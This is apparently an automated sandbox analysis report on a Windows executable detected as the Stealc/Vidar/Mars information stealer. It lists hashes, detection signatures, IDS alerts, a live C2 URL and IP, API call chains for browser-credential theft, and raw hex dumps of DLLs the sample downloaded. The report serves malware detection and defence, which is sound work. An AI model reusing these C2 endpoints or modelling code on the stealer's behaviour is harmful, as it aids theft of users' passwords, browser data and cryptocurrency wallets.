Windows Analysis Report
FFAk2gixx5.exe

Overview

General Information

Sample name: FFAk2gixx5.exe (renamed because the original name is a hash value)
Original sample name: 14cd6d9cbad80b0e4076212bf7ad937f.exe
Analysis ID: 1436574
MD5: 14cd6d9cbad80b0e4076212bf7ad937f
SHA1: 6f553fad2fd973d52dec55582490eb8c3a35b6e1
SHA256: 1738d5ec9cf4a62d3bebdb8690d208dc4e9bb957ba427233920a2195b04bb52e
Tags: exe, Stealc

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FFAk2gixx5.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\FFAk2gixx5.exe" MD5: 14CD6D9CBAD80B0E4076212BF7AD937F)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://okkolus.com/cf5cbdf706840b3f.php"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
Source | Rule | Description | Author | Strings
00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
00000000.00000002.3315657325.0000000002C37000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1208:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Source | Rule | Description | Author | Strings
0.2.FFAk2gixx5.exe.2fc0e67.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.FFAk2gixx5.exe.2fc0e67.2.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
0.2.FFAk2gixx5.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.FFAk2gixx5.exe.400000.0.raw.unpack | JoeSecurity_MarsStealer | Yara detected Mars stealer | Joe Security
0.3.FFAk2gixx5.exe.2ff0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
No Sigma rule has matched

Timestamp: 05/06/24-02:52:39.695594
SID: 2051831
Source Port: 80
Destination Port: 49708
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/06/24-02:52:38.714464
SID: 2044244
Source Port: 49707
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/06/24-02:52:39.070096
SID: 2051828
Source Port: 80
Destination Port: 49707
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/06/24-02:52:39.336133
SID: 2044246
Source Port: 49708
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/06/24-02:52:38.047891
SID: 2044243
Source Port: 49706
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: http://okkolus.com/cf5cbdf706840b3f.php | Avira URL Cloud: Label: malware
Source: http://okkolus.com/cf5cbdf706840b3f.php/M | Avira URL Cloud: Label: malware
Source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "http://okkolus.com/cf5cbdf706840b3f.php"}
Source: okkolus.com | Virustotal: Detection: 10%
Source: http://okkolus.com | Virustotal: Detection: 10%
Source: http://okkolus.com/cf5cbdf706840b3f.php | Virustotal: Detection: 13%
Source: http://okkolus.com/dfaf16606234b71d/nss3.dlle | Virustotal: Detection: 5%
Source: FFAk2gixx5.exe | ReversingLabs: Detection: 71%
Source: FFAk2gixx5.exe | Virustotal: Detection: 68%
Source: FFAk2gixx5.exe | Joe Sandbox ML: detected
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: CtIvEWInDoW
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: AgEBOxw
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: OsUse
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: }@@@e$@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: L 45`vy`ty`tx`sp@@@@<@@@
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: >22lmnopq((\]^_`abcdefghijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: %s\%_
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: %s\%]
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: ijklmnopqrs
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: [EGEKM^Ywxyztasc}567y9n/S
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: jAss}ord
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: '!#!/!#{|}
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: `o^UFF
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: {K}ri*#
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: advapi32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: HeapFree
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: GetLocaleInfoA
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: ntProcessId
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: wininet.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: shlwapi.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: shell32.dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: .dll
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: khrc7C9Pm
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: column_text
Source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack | String decryptor: login:
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00415590 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FC6E77 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD57F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FC97A7 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FC9707 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCC1F7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,

Compliance

Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Unpacked PE file: 0.2.FFAk2gixx5.exe.400000.0.unpack
Source: FFAk2gixx5.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: mozglue.pdbP source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: mozglue.pdb source: mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Traffic | Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49706 -> 31.41.44.147:80
Source: Traffic | Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49707 -> 31.41.44.147:80
Source: Traffic | Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 31.41.44.147:80 -> 192.168.2.6:49707
Source: Traffic | Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49708 -> 31.41.44.147:80
Source: Traffic | Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 31.41.44.147:80 -> 192.168.2.6:49708
Source: Malware configuration extractor | URLs: http://okkolus.com/cf5cbdf706840b3f.php
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 18:30:30 GMTETag: "10e436-5e7f2463c1d80"Accept-Ranges: bytesContent-Length: 1106998Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 
00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "a7550-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 685392Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "94750-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 608080Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 